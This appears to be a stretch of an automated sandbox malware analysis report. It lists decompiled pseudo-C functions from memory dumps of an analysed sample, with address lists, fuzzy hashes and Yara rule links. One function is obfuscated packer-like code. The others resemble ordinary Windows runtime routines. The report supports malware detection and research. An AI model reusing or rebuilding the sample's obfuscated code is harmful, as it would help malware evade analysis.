0x01a12bbd
0x01a12bb7
0x01a12b5d
0x01a12c2f
0x01a55d5b
0x01a55d77
0x01a55d87
0x01a55d93
0x01a12c35
0x01a12c35
0x01a12c35
0x01a12c2f
0x01a12b65
0x01a12b9f
0x01a12ba2
0x01a12b67
0x01a12b67
0x01a12b69
0x01a12b6b
0x01a12b6e
0x01a12bc9
0x01a12bcc
0x01a12bcf
0x01a12bd4
0x01a12bd6
0x01a12bd6
0x01a12bdb
0x01a12c02
0x01a12c05
0x01a12c07
0x00000000
0x01a12c07
0x01a12be0
0x01a12c00
0x01a12c3f
0x01a12c3f
0x00000000
0x01a12c00
0x01a12be5
0x01a12be7
0x01a12bec
0x01a12bf4
0x01a12bf6
0x00000000
0x01a12bf6
0x01a12b70
0x01a12b76
0x01a12b2b
0x01a12b2b
0x01a12b2d
0x01a12b2f
0x01a12b32
0x01a12b35
0x01a12b3a
0x00000000
0x01a12b40
0x01a12b43
0x01a12b45
0x01a12b47
0x01a12b4a
0x01a12b4d
0x01a12b53
0x00000000
0x00000000
0x00000000
0x01a12b53
0x01a12b78
0x01a12b78
0x01a12b7b
0x01a12b7e
0x00000000
0x01a12b7e
0x01a12b76
0x01a12ba5
0x01a12ba5
0x01a12ba8
0x01a12bad
0x00000000
0x00000000
0x01a12baf
0x01a12baf
0x01a12bc2
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a93c370ee7dbfea193a75e1419a275b3c7ee34d909c9fd50cd30e72d522446
Instruction ID: 0c7959e16d8c681a2d38b6387fc3499137fe4d3fe51bd72d62241b733fc0f54a
Opcode Fuzzy Hash: e0a93c370ee7dbfea193a75e1419a275b3c7ee34d909c9fd50cd30e72d522446
Instruction Fuzzy Hash: 6A51D67AB04515CFCB18CF1DC480ABDB7B2FB88700729845BE8569B369D734EA55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041C124, Relevance: .1, Instructions: 148
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E0041C124(signed char __eax, void* __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed char _t9;
				signed char _t17;
				signed char _t19;
				signed int _t23;
				void* _t24;
				void* _t25;
				signed int _t27;

				_t9 = __eax;
				 *0x3813f3be =  *0x3813f3be & __edi;
				_t19 = __edx ^  *0x20921030;
				_t23 = __esi &  *0xc8103507;
				 *0x484161c6 =  *0x484161c6 + __ebx;
				asm("adc esi, 0x1b43849f");
				 *0x24148dde =  *0x24148dde & __edi;
				_pop(_t17);
				asm("adc ch, 0xb1");
				_t27 =  *0xb8c80e17;
				 *0xb8c80e17 = _t25 + 1;
				 *0xc3df64db =  *0xc3df64db + _t19;
				if( *0xc3df64db < 0) {
					 *0x5d725c71 =  *0x5d725c71 & __ecx;
					_t3 = __esp;
					__esp =  *0xf4e48906;
					 *0xf4e48906 = _t3;
					__eflags = __ecx -  *0x3b889411;
					__esi = __esi + 1;
					asm("sbb dh, 0x84");
					__ecx = __ecx + 0x170b09bf;
					__esi = __esi ^ 0xe6cd7596;
					asm("sbb dh, 0x10");
					__edx = __edx |  *0xf6cab439;
					__edi = __edi ^ 0xd81413c5;
					__ebp = __ebp +  *0x58da11be;
					 *0xb4acd53b =  *0xb4acd53b & __edx;
					 *0xc5b71ff9 =  *0xc5b71ff9 << 0x70;
					asm("adc [0x2f5417e7], dl");
					__eax = __eax & 0x3d082511;
					 *0x777eac39 =  *0x777eac39 ^  *0x93a574bc;
					__ecx = __ecx + 1;
					__eflags =  *0xef89c1f9 & 0x00000014;
					__esi = ( *0x777eac39 ^  *0x93a574bc) -  *0x463bca67;
					asm("rol byte [0x1809bf84], 0xa1");
					asm("movsw");
					__ebp =  *0x709a4560 * 0x6a2;
					__edi = __edi ^  *0x3cde5701;
					__eflags = __edi;
					if(__eflags >= 0) {
						asm("adc edx, 0xe5b8370");
						asm("lodsb");
						if(__eflags < 0) {
							__esp =  *0x61283d7d * 0x27fa;
							asm("ror byte [0x91146b3a], 0xd4");
							asm("rcl byte [0x435d1b30], 0xb0");
							__eflags = __ecx -  *0x5e03e06f;
							__edi = __edi +  *0x926c40ee;
							__edx = __edx &  *0xb6090b17;
							__eflags = __edx;
							if(__edx < 0) {
								__ebx =  *0xab1ec7d * 0x1447;
								asm("rcr dword [0xd81e17f8], 0xed");
								__edx = __edx & 0x014e6aee;
								__ah = __ah +  *0xf3385a10;
								 *0xc8eb7ff5 =  *0xc8eb7ff5 << 0xfb;
								asm("sbb eax, 0x993f3c6c");
								__eflags = __ah -  *0xde1b4384;
								asm("sbb ecx, 0x2652108d");
								L1();
								__edi = __edi | 0x28c0f5e8;
								 *0x82fb7bd8 =  *0x82fb7bd8 ^ __ebx;
								asm("lodsb");
								 *0xde1b4384 =  *0xde1b4384 + __cl;
								__esp =  *0x1ba8138d;
								0x6656fd = 0x6604dc;
								__ebp = 0x6604dc ^  *0x82a93387;
								 *0xf1746a05 =  *0xf1746a05 << 0x3e;
								__cl = __cl +  *0xe27e0ce7;
								asm("sbb ah, 0xd0");
								asm("sbb ebx, 0xcaec78f1");
								__ebx = __ebx | 0x24149605;
								__ebx = __ebx -  *0x50bb0f3e;
								_push( *0xff120fd);
								asm("rcl byte [0x77f04b63], 0x53");
								__edi = __edi |  *0xa7884597;
								__eflags = __edi -  *0x8cf110a9;
								if(__edi <  *0x8cf110a9) {
									goto L1;
								} else {
									__esp =  *0x3d93ac7c * 0xa43c;
									__eflags =  *0x84ac81f4 & __eax;
									__ebx = __ebx + 1;
									__esp =  *0xc8dde1b;
									 *0x51033c86 =  *0x51033c86 >> 0xd8;
									__edi = __edi - 1;
									_push( *0x9605ceec);
									asm("rcl byte [0xd3e2414], 0xff");
									 *0x381e6ebe =  *0x381e6ebe ^ __eax;
									__edi = __edi -  *0x4bacaa07;
									 *0xbb9a40e7 =  *0xbb9a40e7 & __ch;
									asm("rol byte [0x8dc416b4], 0xcf");
									__eflags = __edi -  *0xa78ad181;
									asm("sbb ebx, [0x24df106]");
									__dl = __dl - 4;
									__edi = __edi ^ 0x048ccbbe;
									asm("stosd");
									asm("adc [0xc689429a], edi");
									asm("movsw");
									 *0x1c8710c0 =  *0x1c8710c0 >> 0xe3;
									_t8 = __cl;
									__cl =  *0x6cc90df6;
									 *0x6cc90df6 = _t8;
									_push(__eax);
									asm("sbb dl, 0xf6");
									 *0x849d340b =  *0x849d340b - __ebx;
									__ebx = __ebx + 1;
									__eflags =  *0x108dde1b - __esp;
									__ebx = __ebx + 1;
									asm("adc [0xb0e6c4e3], cl");
									asm("sbb [0x473e098b], esp");
									_push(__edx);
									__edx = __edx + 0xb970f58b;
									__ah = __ah | 0x000000e5;
									__ecx = __ecx ^  *0xbd13108d;
									__eflags = __edi;
									return __eax;
								}
							}
						}
					}
				}
				L1:
				_t27 = _t27 | 0xb91a0d09;
				 *0x72e9c312 =  *0x72e9c312 + _t19;
				asm("adc [0x1db93386], bl");
				_push( *0x311fc781);
				_t9 = _t9 -  *0xbc0d211e | 0x000000f6;
				if(_t9 < 0) {
					 *0xcb4e779 = _t9;
					 *0xa64daee1 =  *0xa64daee1 & _t17;
					asm("adc ecx, 0x21a46e15");
					if( *0xa64daee1 != 0) {
						 *0x3efc5374 = _t19;
						asm("adc bl, [0xea4f3308]");
						asm("rol dword [0x205aea3e], 0xa9");
						 *0xd2f0eb3 =  *0xd2f0eb3 >> 0x7f;
						asm("rcl byte [0xbba3c718], 0x69");
						 *0xb5903b28 =  *0xb5903b28 << 0xf8;
						asm("ror byte [0x628b13b4], 0x18");
						_t24 = _t24 -  *0x3886252b;
						_t19 =  *0x3efc5374 ^  *0xbaa9d86;
						 *0x412110e7 = _t9;
						 *0x4dde55f0 =  *0x4dde55f0 >> 0x71;
						asm("sbb [0xc9edcc6d], ecx");
						_t23 = _t23 - 1;
						_t9 = _t9 + 1;
						 *0x62d4c50a =  *0x62d4c50a >> 0xf0;
					}
				}
				goto L1;
			}

0x0041c124
0x0041c129
0x0041c12f
0x0041c135
0x0041c13b
0x0041c141
0x0041c147
0x0041c15a
0x0041c166
0x0041c169
0x0041c169
0x0041c16f
0x0041c175
0x0041c17b
0x0041c181
0x0041c181
0x0041c181
0x0041c187
0x0041c18d
0x0041c18e
0x0041c191
0x0041c197
0x0041c19d
0x0041c1a0
0x0041c1a6
0x0041c1ac
0x0041c1b2
0x0041c1b8
0x0041c1c5
0x0041c1cb
0x0041c1d6
0x0041c1dc
0x0041c1dd
0x0041c1e0
0x0041c1e6
0x0041c1ed
0x0041c1ef
0x0041c1f9
0x0041c1f9
0x0041c1ff
0x0041c205
0x0041c20b
0x0041c20c
0x0041c212
0x0041c21c
0x0041c223
0x0041c22a
0x0041c230
0x0041c236
0x0041c236
0x0041c23c
0x0041c242
0x0041c24c
0x0041c253
0x0041c259
0x0041c25f
0x0041c266
0x0041c26b
0x0041c271
0x0041c277
0x0041c27c
0x0041c282
0x0041c288
0x0041c289
0x0041c28f
0x0041c29a
0x0041c2a0
0x0041c2a6
0x0041c2ad
0x0041c2b3
0x0041c2b6
0x0041c2bc
0x0041c2c2
0x0041c2c8
0x0041c2ce
0x0041c2d5
0x0041c2db
0x0041c2e1
0x00000000
0x0041c2e7
0x0041c2e7
0x0041c2f1
0x0041c2f7
0x0041c2f8
0x0041c2fe
0x0041c305
0x0041c306
0x0041c30c
0x0041c313
0x0041c319
0x0041c31f
0x0041c325
0x0041c32c
0x0041c332
0x0041c338
0x0041c33b
0x0041c341
0x0041c342
0x0041c348
0x0041c34a
0x0041c351
0x0041c351
0x0041c351
0x0041c357
0x0041c358
0x0041c35b
0x0041c361
0x0041c362
0x0041c368
0x0041c369
0x0041c36f
0x0041c375
0x0041c376
0x0041c37c
0x0041c37f
0x0041c385
0x0041c38b
0x0041c38b
0x0041c2e1
0x0041c23c
0x0041c20c
0x0041c1ff
0x0041b4a6
0x0041b4a6
0x0041b4ac
0x0041b4b8
0x0041b4be
0x0041b4c4
0x0041b4c7
0x0041b4c9
0x0041b4ce
0x0041b4d4
0x0041b4da
0x0041b4dc
0x0041b4e2
0x0041b4e8
0x0041b4f5
0x0041b4fc
0x0041b509
0x0041b510
0x0041b51d
0x0041b529
0x0041b52f
0x0041b534
0x0041b53b
0x0041b541
0x0041b542
0x0041b549
0x0041b549
0x0041b4da
0x00000000

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19b4149aaf00997a0a67890a8c143e9198a0b6c1cec653bfa68b9ee62b0ac9d4
Instruction ID: 3ad36036964adfea8a604e5a26cd91530aae3b5922006a5170680a133b60949c
Opcode Fuzzy Hash: 19b4149aaf00997a0a67890a8c143e9198a0b6c1cec653bfa68b9ee62b0ac9d4
Instruction Fuzzy Hash: FF712532A097818BD312DF39C9956513FB1F797334B09434EC5B2A38E2D774256ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 019FEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E019FEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E019E9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E019E2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x019fef4b
0x019fef4d
0x019fef57
0x019ff0bd
0x019ff0c2
0x019ff0d2
0x019ff0d2
0x019ff0c2
0x019fef5d
0x019fef5f
0x019fef67
0x019fef6a
0x019fef6d
0x019fef74
0x019fef7f
0x019fef82
0x019fef82
0x019fef86
0x019fef88
0x019fef8c
0x019fef8f
0x019fef8f
0x019fef8f
0x00000000
0x019fef91
0x019fef93
0x019fefc4
0x019fefc4
0x019fefc4
0x019fefca
0x019fefd0
0x019ff0a6
0x00000000
0x00000000
0x019ff0af
0x01a4bb06
0x01a4bb0a
0x019ff0b5
0x019ff0b5
0x019ff0b5
0x019ff0b5
0x00000000
0x019fefd6
0x019fefd9
0x019ff0de
0x019ff0e2
0x019fefdf
0x019fefdf
0x019fefdf
0x019fefe5
0x01a4bafc
0x01a4bafc
0x019fefe5
0x019fefeb
0x019fefed
0x019ff00f
0x019ff011
0x019ff01a
0x019ff01d
0x019ff021
0x019ff028
0x019ff029
0x019ff029
0x019ff02c
0x00000000
0x019ff02c
0x019feff3
0x019feff9
0x019ff0ea
0x019ff0ed
0x019ff0ef
0x00000000
0x019ff0ef
0x019ff003
0x01a4bb12
0x019ff045
0x019ff049
0x019ff051
0x019ff09e
0x019ff0a0
0x019ff0a0
0x019ff09e
0x019ff053
0x019ff064
0x019ff064
0x019ff06b
0x01a4bb1a
0x01a4bb1a
0x019ff071
0x019ff071
0x019ff07d
0x019ff082
0x019ff08f
0x019ff08f
0x019ff009
0x019ff00d
0x00000000
0x019ff00d
0x019fefd0
0x019fef97
0x019fefa5
0x019fefaa
0x00000000
0x019fefac
0x019fefac
0x019fefac
0x00000000
0x019fefb2
0x019ff036
0x019ff03a
0x019ff040
0x019ff090
0x00000000
0x019ff092
0x019ff042
0x00000000
0x019ff042
0x019fefb7
0x019fefb9
0x019fefbc
0x019fefb0
0x019fefb0
0x00000000
0x019fefbe
0x019fefbe
0x019fefc1
0x00000000
0x019fefc1
0x019fefbc
0x019fefaa
0x019fef91

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 43565296ce17217291c6f4148516c519f27391a5181617fb6d2391228d4e8da9
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: E3510232E04249FFEB25CF6CC1C0BAEBBB5AF45314F1881ACD64993292C375A989C751

Uniqueness

Uniqueness Score: -1.00%

Function 01AB740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E01AB740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E01A3D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E01A2F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01A04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01A04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E01A2F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01A04620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x01ab740d
0x01ab740d
0x01ab7412
0x01ab7413
0x01ab7416
0x01ab7418
0x01ab741c
0x01ab741f
0x01ab7422
0x01ab7422
0x01ab7428
0x01ab742a
0x01ab742a
0x01ab7451
0x01ab7432
0x01ab744f
0x01ab744f
0x00000000
0x01ab7434
0x01ab7438
0x01ab7443
0x01ab7517
0x01ab7517
0x01ab751a
0x01ab7535
0x01ab7520
0x01ab7527
0x01ab752c
0x01ab7531
0x01ab7533
0x00000000
0x01ab7533
0x00000000
0x01ab7531
0x01ab754b
0x01ab754f
0x01ab755c
0x01ab755c
0x01ab755f
0x01ab7560
0x01ab7561
0x01ab7562
0x01ab7563
0x01ab7568
0x01ab756a
0x01ab756c
0x01ab756d
0x01ab756d
0x01ab756f
0x01ab7572
0x01ab7574
0x01ab7577
0x01ab757c
0x01ab757f
0x00000000
0x01ab7551
0x01ab7551
0x01ab7551
0x01ab7553
0x01ab7553
0x01ab7449
0x01ab7449
0x01ab744c
0x01ab744c
0x00000000
0x01ab744c
0x01ab7443
0x01ab750e
0x01ab7514
0x01ab7514
0x01ab7455
0x01ab7469
0x01ab746d
0x00000000
0x01ab7473
0x01ab7473
0x01ab7476
0x01ab7480
0x01ab7484
0x01ab748e
0x01ab7493
0x01ab7493
0x01ab7496
0x01ab7499
0x01ab74a1
0x01ab74b1
0x01ab74b5
0x00000000
0x01ab74bb
0x01ab74c1
0x01ab74c1
0x01ab74c4
0x01ab74c5
0x01ab74c6
0x01ab74c7
0x01ab74c8
0x01ab74cd
0x00000000
0x01ab74d3
0x01ab74d3
0x01ab74d6
0x01ab74d8
0x01ab74db
0x01ab74dd
0x01ab74e0
0x01ab74e7
0x01ab74ee
0x01ab74ee
0x01ab74f4
0x01ab74f9
0x00000000
0x01ab74fb
0x01ab74fb
0x01ab74fd
0x01ab7500
0x01ab7503
0x01ab7505
0x01ab7505
0x01ab74f9
0x00000000
0x01ab74cd
0x01ab74b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: ebd4374faa17f06808905c6cea1be3da960104b737ca7cdc685e92f60abed8a4
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: F551A171500686DFDB16CF68C980A95FBB9FF85304F14C1AAE9089F292E3B1E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01A12990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01A12990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x1abff00);
				E01A3D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x19c1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E01A2E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x19c1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E01A651BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x19c166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01A12AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E019F6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01A12C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E019FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01A12AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01A12C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01A12ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E01A3D0D1(_t62);
				goto L28;
			}

0x01a12990
0x01a12992
0x01a12997
0x01a129a3
0x01a129a6
0x01a129ab
0x01a129ad
0x01a129b2
